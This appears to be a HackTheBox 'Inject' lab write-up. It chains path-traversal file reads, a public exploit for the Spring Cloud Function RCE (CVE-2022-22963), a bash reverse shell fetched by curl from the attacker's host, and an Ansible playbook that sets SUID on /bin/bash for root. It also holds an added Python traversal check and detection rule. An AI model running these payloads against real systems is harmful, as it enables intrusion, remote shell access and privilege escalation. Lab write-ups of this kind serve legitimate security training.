HackTheBox Inject Writeup
Explore the fundamentals of cybersecurity in the Inject Capture The Flag (CTF) challenge, an easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts
10.10.11.204 inject.htb
Script to add hosts automatically
ip="10.10.11.204"
domain="inject.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV inject.htb
Nmap scan report for inject.htb (10.10.11.204)
Host is up (0.051s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ca:f1:0c:51:5a:59:62:77:f0:a8:0c:5c:7c:8d:da:f8 (RSA)
| 256 d5:1c:81:c9:7b:07:6b:1c:c1:b4:29:25:4b:52:21:9f (ECDSA)
|_ 256 db:1d:8c:eb:94:72:b0:d3:ed:44:b9:6c:93:a7:f9:1d (ED25519)
8080/tcp open nagios-nsca Nagios NSCA
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
http://10.10.11.204:8080/upload
LFI
curl -s 'http://10.10.11.204:8080/show_image?img=../../../../../../etc/passwd' | grep sh$
curl -s 'http://10.10.11.204:8080/show_image?img=pwn' | jq
Output
{
"timestamp": "2024-12-05T05:22:30.253+00:00",
"status": 500,
"error": "Internal Server Error",
"message": "URL [file:/var/www/WebApp/src/main/uploads/pwn] cannot be resolved in the file system for checking its content length",
"path": "/show_image"
}
curl -s 'http://10.10.11.204:8080/show_image?img=../../../pom.xml'
Using the real path revealed by the error message:
curl -s 'http://10.10.11.204:8080/show_image?img=../../../../../../../../../var/www/WebApp/pom.xml' > pom.xml
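As an added defensive example (not code from the original writeup or from the application), this shows the check a fixed /show_image handler should apply to the img parameter, plus a detection rule for the same payloads in access logs. The function names and the Python port are assumptions; the upload root is the one the error message above revealed.

```python
from pathlib import Path
from typing import Optional
from urllib.parse import unquote

# Upload directory as disclosed by the application's own 500 error message.
UPLOAD_ROOT = Path("/var/www/WebApp/src/main/uploads")


def resolve_upload(img: str, root: Path = UPLOAD_ROOT) -> Optional[Path]:
    """Return the file 'img' may legitimately refer to, or None.

    A fixed handler should do this instead of concatenating the raw
    parameter onto the uploads directory (assumed helper, not the app's code).
    """
    # Decode exactly once, as the framework would, so %2e%2e does not slip past.
    name = unquote(img)
    # Only a bare file name is acceptable: no separators, no dot segments, no NUL.
    if not name or name in (".", "..") or "/" in name or "\\" in name or "\x00" in name:
        return None
    candidate = (root / name).resolve()
    # Canonicalise and confirm the result still lives under the upload root;
    # this also catches symlink escapes the string check above would miss.
    try:
        candidate.relative_to(root.resolve())
    except ValueError:
        return None
    return candidate


def is_traversal_attempt(img: str) -> bool:
    """Detection rule for the img parameter as seen in an access log."""
    # Decode twice so double-encoded payloads (%252e%252e) are normalised too.
    name = unquote(unquote(img))
    parts = name.replace("\\", "/").split("/")
    return name.startswith("/") or ".." in parts or "\x00" in name


# Constructed sample values: the page's payloads and one benign request.
SAMPLE_IMG_VALUES = [
    "../../../../../../etc/passwd",
    "..%2F..%2F..%2Fpom.xml",
    "pwn",
]

if __name__ == "__main__":
    for value in SAMPLE_IMG_VALUES:
        print(value, "->", "ALERT" if is_traversal_attempt(value) else "ok",
              "| served:", resolve_upload(value))
```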
snyk test --file=pom.xml
CVE-2022-22963
Output
✗ Remote Code Execution [Critical Severity][https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORKCLOUD-2436645] in org.springframework.cloud:spring-cloud-function-context@3.2.2
introduced by org.springframework.cloud:spring-cloud-function-web@3.2.2 > org.springframework.cloud:spring-cloud-function-context@3.2.2
https://www.exploit-db.com/exploits/51577
wget https://www.exploit-db.com/raw/51577 -O poc
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
echo -e '/bin/bash -i >& /dev/tcp/'$vpnip'/9001 0>&1' > rev.sh
python -m http.server
Listener
nc -lvnp 9001
python poc --url 'http://10.10.11.204:8080/functionRouter' --command 'curl http://10.10.14.18:8000/rev.sh -o /tmp/rev.sh'
python poc --url 'http://10.10.11.204:8080/functionRouter' --command 'bash /tmp/rev.sh'
Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Press Ctrl+Z to background the shell, then run:
stty size; stty raw -echo; fg
As the last step, set the terminal environment:
export TERM=xterm;
cat /home/frank/.m2/settings.xml
su phil
cat /home/phil/user.txt
Although I rarely mention using pspy on Linux, it’s essential to deploy it regularly—similar to linpeas on Linux or BloodHound on Windows—particularly when you’re stuck.
curl -s http://10.10.14.18:8000/pspy64 -o ps
chmod +x ps
./ps
After execution, we observe repeated Ansible playbook runs by root in the output.
/usr/bin/python3 /usr/bin/ansible-playbook /opt/automation/tasks/playbook_1.yml
/usr/bin/cp /root/playbook_1.yml /opt/automation/tasks/
Since playbooks placed in /opt/automation/tasks/ are executed by root, create a playbook there that runs with root privileges.
cd /opt/automation/tasks/
cat playbook_1.yml
nano shell.yml
- hosts: localhost
  tasks:
    - name: Set SUID bit on /bin/bash
      ansible.builtin.shell:
        cmd: "/usr/bin/chmod +s /bin/bash"
Now we watch /bin/bash and wait for the playbook to be picked up:
watch -n 1 'ls -la /bin/bash'
-rwxr-xr-x 1 root root 1183448 Apr 18 2022 /bin/bash
Once the playbook has run, the SUID and SGID bits appear:
-rwsr-sr-x 1 root root 1183448 Apr 18 2022 /bin/bash
bash -p
cat /root/root.txt